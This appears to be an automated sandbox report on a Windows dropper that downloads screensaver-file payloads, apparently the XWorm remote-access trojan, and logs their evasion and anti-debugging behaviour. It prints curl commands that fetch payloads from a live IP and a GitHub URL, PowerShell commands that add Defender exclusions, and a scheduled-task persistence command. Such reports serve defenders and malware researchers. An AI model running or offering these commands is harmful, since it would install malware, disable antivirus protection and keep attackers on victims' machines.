Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\gbcd\qqq.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 45E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 47D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 67D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 6B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 7B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 7C90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: 8C90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\fff.scr Memory allocated: 4EE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\fff.scr Memory allocated: 5070000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\fff.scr Memory allocated: 7070000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 4F90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 5100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 7100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 7470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 8470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 85A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\gbcd\qqq.scr Memory allocated: 95A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Public\winnotify.scr Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 4C40000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 6EF0000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 7EF0000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 8020000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 9020000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 50B0000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 5110000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 7110000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 7510000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 8510000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 8640000 memory reserve | memory write watch
Source: C:\Users\Public\winnotify.scr Memory allocated: 9640000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\gbcd\fff.scr Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\gbcd\qqq.scr Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\winnotify.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\winnotify.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Window / User API: threadDelayed 7007 Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Window / User API: threadDelayed 596 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7305 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2332 Jump to behavior
Source: C:\Users\gbcd\fff.scr Window / User API: threadDelayed 721 Jump to behavior
Source: C:\Users\gbcd\qqq.scr Window / User API: threadDelayed 621 Jump to behavior
Source: C:\Users\gbcd\qqq.scr Window / User API: threadDelayed 3032 Jump to behavior
Source: C:\Users\gbcd\qqq.scr Window / User API: threadDelayed 1764 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7409
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2225
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1930
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8055
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1542
Source: C:\Windows\SysWOW64\curl.exe Dropped PE file which has not been started: C:\Users\gbcd\srtware.exe Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe Dropped PE file which has not been started: C:\Users\gbcd\ddd.scr Jump to dropped file
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe TID: 6412 Thread sleep time: -7007000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe TID: 7040 Thread sleep time: -254000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe TID: 6452 Thread sleep time: -596000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep count: 7305 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 2332 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\gbcd\fff.scr TID: 8044 Thread sleep time: -44000s >= -30000s Jump to behavior
Source: C:\Users\gbcd\fff.scr TID: 1196 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\gbcd\fff.scr TID: 8124 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 3964 Thread sleep count: 621 > 30 Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 3964 Thread sleep count: 224 > 30 Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 7004 Thread sleep count: 3032 > 30 Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 7004 Thread sleep time: -3032000s >= -30000s Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 5812 Thread sleep count: 231 > 30 Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 5812 Thread sleep time: -231000s >= -30000s Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 4732 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Users\gbcd\qqq.scr TID: 6448 Thread sleep count: 1764 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2196 Thread sleep count: 7751 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1168 Thread sleep count: 1930 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1624 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep count: 7810 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep count: 1910 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 8055 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep count: 1542 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2412 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\winnotify.scr TID: 7136 Thread sleep count: 41 > 30
Source: C:\Users\Public\winnotify.scr TID: 7136 Thread sleep time: -41000s >= -30000s
Source: C:\Users\Public\winnotify.scr TID: 7880 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\winnotify.scr TID: 5700 Thread sleep count: 42 > 30
Source: C:\Users\Public\winnotify.scr TID: 5700 Thread sleep time: -42000s >= -30000s
Source: C:\Users\Public\winnotify.scr TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\gbcd\qqq.scr File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\gbcd\qqq.scr File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\winnotify.scr File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\winnotify.scr File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00469CD8 lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00469CD8
Source: C:\Users\gbcd\fff.scr Code function: 23_2_00D33CD8 lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 23_2_00D33CD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\gbcd\fff.scr Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\gbcd\qqq.scr Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\winnotify.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\winnotify.scr Thread delayed: delay time: 922337203685477
Source: winnotify.scr, 00000025.00000002.2209647377.00000000004DF000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: VBoxService.exe
Source: fff.scr, fff.scr, 00000017.00000002.1621058744.0000000000BEE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: ~VirtualMachineTypes
Source: curl.exe, 00000010.00000003.1443472856.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.1511604460.00000000030E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: curl.exe, 0000000E.00000003.1393930970.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: fff.scr, fff.scr, 00000017.00000002.1621058744.0000000000BEE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: winnotify.scr, 00000025.00000002.2209647377.00000000004DF000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: VMWare
Source: fff.scr, 00000017.00000002.1621058744.0000000000BEE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: curl.exe, 00000015.00000003.1543419156.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1624539408.0000000001313000.00000004.00000020.00020000.00000000.sdmp, qqq.scr, 00000018.00000002.3724080428.000000000A574000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\gbcd\fff.scr Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\gbcd\qqq.scr Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\gbcd\qqq.scr Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\winnotify.scr Thread information set: HideFromDebugger
Source: C:\Users\Public\winnotify.scr Thread information set: HideFromDebugger
Source: C:\Users\Public\winnotify.scr Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\gbcd\fff.scr Process token adjusted: Debug Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr' Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c mkdir C:\Users\gbcd Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Users\gbcd\fff.scr "C:\Users\gbcd\fff.scr" Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Users\gbcd\qqq.scr "C:\Users\gbcd\qqq.scr" Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr" Jump to behavior
Source: qqq.scr, 00000018.00000002.3715480219.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, qqq.scr, 00000018.00000002.3715480219.000000000516C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: qqq.scr, 00000018.00000002.3715480219.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, qqq.scr, 00000018.00000002.3715480219.000000000516C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
Source: qqq.scr, 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: qqq.scr, 00000018.00000002.3715480219.000000000516C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerD
Source: qqq.scr, 00000018.00000002.3715480219.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, qqq.scr, 00000018.00000002.3715480219.000000000516C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: qqq.scr, 00000018.00000002.3715480219.00000000051A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerT
Source: qqq.scr, 00000018.00000002.3715480219.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, qqq.scr, 00000018.00000002.3715480219.000000000516C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,lstrcpyn,lstrcpyn, 0_2_00469E90
Source: C:\Users\gbcd\fff.scr Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,lstrcpyn,lstrcpyn, 23_2_00D33E90
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Queries volume information: C:\Users\user\Desktop\ZOL2mIYAUH.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
